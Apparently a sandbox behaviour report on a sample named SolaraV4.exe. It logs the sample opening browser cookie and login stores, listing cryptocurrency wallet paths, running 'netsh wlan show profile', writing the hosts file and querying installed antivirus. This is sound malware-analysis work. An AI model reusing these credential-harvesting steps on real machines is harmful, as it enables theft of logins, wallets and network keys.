Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC5D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_00007FF6FFC5D010
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC75E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 1_2_00007FF6FFC75E7C
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C72248CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW, 108_2_00007FF7C72248CC
Source: C:\Users\user\Desktop\SolaraV4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\SolaraV4.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2470820627.000002125C3B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2974193857.0000024132D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2470820627.000002125C3B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2975881407.0000024133496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2965972242.0000024133565000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2492379018.0000024132FF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 7112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SolaraV4.exe PID: 4300, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI71122\rarreg.key, type: DROPPED
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxxz
Source: SolaraV4.exe, 00000003.00000002.2977470781.00000241337B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: SolaraV4.exe, 00000003.00000002.2977470781.00000241337B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodusz
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: EthereumZ
Source: SolaraV4.exe, 00000003.00000002.2977470781.00000241337B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: SolaraV4.exe, 00000003.00000003.2491764058.0000024132FE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystoreZ
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\permissions.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\content-prefs.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\favicons.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\webappsstore.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\2a4244a9-6ddb-4fcf-8518-af8544f13140
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\storage.sqlite
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release
Source: C:\Users\user\Desktop\SolaraV4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
